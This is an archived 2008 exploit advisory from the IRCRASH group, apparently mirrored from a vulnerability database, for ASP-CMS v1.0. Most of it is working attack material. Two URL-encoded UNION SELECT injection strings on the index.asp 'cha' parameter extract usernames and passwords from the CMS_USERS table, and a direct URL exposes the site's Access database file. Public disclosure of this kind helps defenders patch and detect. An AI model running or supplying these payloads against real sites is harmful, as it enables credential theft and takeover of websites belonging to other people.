Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21011
HistoryDec 14, 2008 - 12:00 a.m.

ASP-CMS v.1.0 Sql Injection/Database Disclosure

2008-12-1400:00:00
vulners.com
81

#####################################################################################

ASP-CMS v.1.0 Sql Injection/Database Disclosure

#####################################################################################

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################

#Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip

#DORK : :( #

#####################################################################################

[Sql Injection]

#Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS

#Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS

#####################################################################################

[Database Disclosure]

#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb #

#####################################################################################

Site : Http://IRCRASH.COM

###################################### TNX GOD ######################################